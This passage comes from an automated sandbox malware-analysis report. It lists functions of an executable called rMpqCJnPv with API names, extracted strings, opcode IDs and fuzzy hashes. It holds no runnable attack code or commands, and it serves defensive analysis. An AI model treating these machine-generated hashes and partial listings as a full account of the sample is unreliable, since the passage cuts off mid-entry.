                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a4b43b05b4d174de04649b256e334c2e39119974175c185e79b62e938d94deaa
                                                                                                                    • Instruction ID: 2930499881f086f30db19de2a3523b1665d37c5b0922120f49f6a6223e04a607
                                                                                                                    • Opcode Fuzzy Hash: a4b43b05b4d174de04649b256e334c2e39119974175c185e79b62e938d94deaa
                                                                                                                    • Instruction Fuzzy Hash: 1B528E32A0868285EB25FA1DD09967CA765FF2AB84F954532DF0E076B9CE3CF450C364
                                                                                                                    Function 00007FF7BB7EB390 Relevance: .7, Instructions: 682COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Concurrency::cancel_current_task
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 118556049-0
                                                                                                                    • Opcode ID: 3cb233c4a187eaa6156090578809cbb5e16a91a184f825cdb4b4625543c8a408
                                                                                                                    • Instruction ID: fff18ebdc981493e3021ab093170c3e373fab60040dead0a2dddeb2db3a8c621
                                                                                                                    • Opcode Fuzzy Hash: 3cb233c4a187eaa6156090578809cbb5e16a91a184f825cdb4b4625543c8a408
                                                                                                                    • Instruction Fuzzy Hash: F5527E72B0864185EB10EFADD0842BC67A5BF6AB94F804236DF1D677E9DE38E415C390
                                                                                                                    Function 00007FF7BB7EB9F0 Relevance: .6, Instructions: 577COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b951c5925a95d5b58dccb17be3fafdb1a67d27fe6001d4236f33553bbcd64c6e
                                                                                                                    • Instruction ID: 46631fcd97c01d8c2775ad204713fd35bcf24d9e288cd5be4ac2eaa803db5407
                                                                                                                    • Opcode Fuzzy Hash: b951c5925a95d5b58dccb17be3fafdb1a67d27fe6001d4236f33553bbcd64c6e
                                                                                                                    • Instruction Fuzzy Hash: 4442BF32A0864286EB10EB6DD4802ADBBA4FF96798F904132DF5D47BB9CF38E451C750
                                                                                                                    Function 00007FF7BB8130DC Relevance: .5, Instructions: 535COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 44e0bcb64cdb213a1ae13f0197e832722533c3c8cf9ea28823a7f9588fce5fb2
                                                                                                                    • Instruction ID: 36a94f0ceafc8591987bbe9fd17d89d7da92d1e6604b4dbc460e70b9ddbeafaf
                                                                                                                    • Opcode Fuzzy Hash: 44e0bcb64cdb213a1ae13f0197e832722533c3c8cf9ea28823a7f9588fce5fb2
                                                                                                                    • Instruction Fuzzy Hash: 4C426421929E4995E653AB3DA411539A324BF777C0F809333EF4E76638DF2CF4628690
                                                                                                                    Function 00007FF7BB826DE4 Relevance: .2, Instructions: 194COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3215553584-0
                                                                                                                    • Opcode ID: 8d8f3e37eadd19746a70c291c5831625e20ba123285d38ae931568fef80f1606
                                                                                                                    • Instruction ID: cf7d05144738870d39a775c6f5a682ac792201bbacc36e33917f481add2e989a
                                                                                                                    • Opcode Fuzzy Hash: 8d8f3e37eadd19746a70c291c5831625e20ba123285d38ae931568fef80f1606
                                                                                                                    • Instruction Fuzzy Hash: 12711E26E0C28247FB646A6D9450778D281BF62360FA40634DF5D476FDDE7DEC6087A0
                                                                                                                    Function 00007FF7BB861A18 Relevance: .1, Instructions: 66COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c2308bd2b59363eb380d9f2aadf6ae7fcc9e74111fd97fe2ff68e231cb56cb52
                                                                                                                    • Instruction ID: 37bd4db32120363f129ad509e4ab3e4098fbff290c2fc05b0f1648f232c49c12
                                                                                                                    • Opcode Fuzzy Hash: c2308bd2b59363eb380d9f2aadf6ae7fcc9e74111fd97fe2ff68e231cb56cb52
                                                                                                                    • Instruction Fuzzy Hash: FB21D173A2450186E709DF7DD8526B973A5B775708F88C13ECA2B87298CE3CE914C790
                                                                                                                    Function 00007FF7BB81FD20 Relevance: .0, Instructions: 32COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f4e4605b7b007d95894f61c83fec82003118576a017aad510c5c4214a882ee24
                                                                                                                    • Instruction ID: b9c41dd357f5c702b0daab2e42b0215942a5dbc94df7fab3e0a837a0f86a1d22
                                                                                                                    • Opcode Fuzzy Hash: f4e4605b7b007d95894f61c83fec82003118576a017aad510c5c4214a882ee24
                                                                                                                    • Instruction Fuzzy Hash: 8FF068B1B183A58AEB94DF2CA44262977D0F75C380F908039DA8D83F58DA3C9464DF54
                                                                                                                    Function 00007FF7BB8059C8 Relevance: .0, Instructions: 2COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 06a18b8ad93dc8222913c3b18848eb7fe0d0fd2f3d8a242d5e2f0303cc3a2d96
                                                                                                                    • Instruction ID: 788bf822241f072ee7b310f42e7f1a45cf5c5966a97dfa769f2afadad06cbf88
                                                                                                                    • Opcode Fuzzy Hash: 06a18b8ad93dc8222913c3b18848eb7fe0d0fd2f3d8a242d5e2f0303cc3a2d96
                                                                                                                    • Instruction Fuzzy Hash: E2A0012591A90294EA05AB1CE8940A0A360BB62350BD11432DA4D4147AAE3CA4A082B0
                                                                                                                    Function 00007FF7BB88E95C Relevance: 49.7, APIs: 33, Instructions: 231windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3521893082-0
                                                                                                                    • Opcode ID: 0b026472fdff9280be77dd4824f98d5db167a0134dcdfe5d0ed9e16faea0a559
                                                                                                                    • Instruction ID: d52e8ca1798281c030b3d96c6245886cc7e117ea4adb21eea4b38be35fc7cce5
                                                                                                                    • Opcode Fuzzy Hash: 0b026472fdff9280be77dd4824f98d5db167a0134dcdfe5d0ed9e16faea0a559
                                                                                                                    • Instruction Fuzzy Hash: F4A1B422F0470286EB14AB7DD8485BC6761BB6AB65F805235DF6E13BE8DF3CA4548390
                                                                                                                    Function 00007FF7BB864F30 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 247COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$DriveType
                                                                                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                    • API String ID: 2907320926-4222207086
                                                                                                                    • Opcode ID: 94db47e06bd0190674c94e1b1137c27149ea748c604d997c0ecd6c7b010eced7
                                                                                                                    • Instruction ID: 9bf27381f80699e14310093098195643472cf57ece6b83bb57650c520c700bc4
                                                                                                                    • Opcode Fuzzy Hash: 94db47e06bd0190674c94e1b1137c27149ea748c604d997c0ecd6c7b010eced7
                                                                                                                    • Instruction Fuzzy Hash: 56B19211A0CA0B91EA64BB2DC4501BCA361BF6A784BD45132DF0F876BDDF3DE56583A0
                                                                                                                    Function 00007FF7BB88ECB4 Relevance: 39.2, APIs: 26, Instructions: 179windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1996641542-0
                                                                                                                    • Opcode ID: 272147b9b925c8714afe06ced8d7687a04f27c0b5a6964841feef97b8e291f9c
                                                                                                                    • Instruction ID: 5dad94311c3fcacaab2f70117b9db83eb6cf51dbfae5687fb98c138b912228ec
                                                                                                                    • Opcode Fuzzy Hash: 272147b9b925c8714afe06ced8d7687a04f27c0b5a6964841feef97b8e291f9c
                                                                                                                    • Instruction Fuzzy Hash: F371D835A08B4183DB14AB6DE848679B361FB9AB61F405234DF5E43BA8DF3CE454C790
                                                                                                                    Function 00007FF7BB886EA0 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 268windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                    • String ID: tooltips_class32
                                                                                                                    • API String ID: 698492251-1918224756
                                                                                                                    • Opcode ID: 134fb4e1424d2fb4e321c1dd5c8cc0f154a29b10d7bebbc83ea585521f9a7016
                                                                                                                    • Instruction ID: 8260cddae329b32328266d96d8fdc70f3c44b55679f2c8ef8d58e1f70966f080
                                                                                                                    • Opcode Fuzzy Hash: 134fb4e1424d2fb4e321c1dd5c8cc0f154a29b10d7bebbc83ea585521f9a7016
                                                                                                                    • Instruction Fuzzy Hash: BDC11C36A087428BEB149F6DE8482ADB7A0FB99B94F901035DF5E47B68CF38E451C750
                                                                                                                    Function 00007FF7BB852C10 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 175windowtimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 3869813825-2766056989
                                                                                                                    • Opcode ID: b82c187733dd5023c28d903207b62df0d5996a373ba8083c7f15af3311f57f4a
                                                                                                                    • Instruction ID: c9d33deca5bc22b3f176938fc5fd0bb7b56acb226f4d68f807e7147ce7537e7e
                                                                                                                    • Opcode Fuzzy Hash: b82c187733dd5023c28d903207b62df0d5996a373ba8083c7f15af3311f57f4a
                                                                                                                    • Instruction Fuzzy Hash: B6819D32A04A4286EB40EF7DD8946AD73A0FB55B88F805131CF4EA766CDF38E855C790
                                                                                                                    Function 00007FF7BB891254 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 162windowfileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreenwcscat
                                                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                    • API String ID: 2091158083-3440237614
                                                                                                                    • Opcode ID: 7c2f099bf0a5769a0aea507f3e3fb0e9d810cef93c6a9b2b7ff31669fef11a09
                                                                                                                    • Instruction ID: 8fa1adaa281da562902795232578c7ba02edf431747d1f05c9186cd849798f9c
                                                                                                                    • Opcode Fuzzy Hash: 7c2f099bf0a5769a0aea507f3e3fb0e9d810cef93c6a9b2b7ff31669fef11a09
                                                                                                                    • Instruction Fuzzy Hash: AC714E31618A8296EB50EB6DE8446E9A720FB96798FC01032EF4D07ABDCF7CE155C750
                                                                                                                    Function 00007FF7BB863FD0 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 197COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: SendString$BuffCharDriveLowerType
                                                                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                    • API String ID: 1600147383-4113822522
                                                                                                                    • Opcode ID: c97716080e4f543c9a20482f6ee2b28a1c64bce64f7816063184408ee6a3b085
                                                                                                                    • Instruction ID: 753d644d38d714f677a0c470886ec8baed29f57a959677070ca14a2ae510e7da
                                                                                                                    • Opcode Fuzzy Hash: c97716080e4f543c9a20482f6ee2b28a1c64bce64f7816063184408ee6a3b085
                                                                                                                    • Instruction Fuzzy Hash: 3D81A322B14A1285EB10AF6DD8512BCA3A5FB6AB84F944431CF0E877B9DF3CE455C360
                                                                                                                    Function 00007FF7BB8903D0 Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3840717409-0
                                                                                                                    • Opcode ID: 7c311c18288b1496fa214aa0c4abe44590be5c31b38ad7f7d9d564ed982c3a32
                                                                                                                    • Instruction ID: 4d96547330ed4a09af0ddf5681d7044ea8736d0244e5af75267695e90ba8c5ab
                                                                                                                    • Opcode Fuzzy Hash: 7c311c18288b1496fa214aa0c4abe44590be5c31b38ad7f7d9d564ed982c3a32
                                                                                                                    • Instruction Fuzzy Hash: 2A517D36B04B018AEB14DF7AE818AAD73A0FB59B94B905131DE9D03B28DF3DE415C750
                                                                                                                    Function 00007FF7BB860D70 Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 388COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
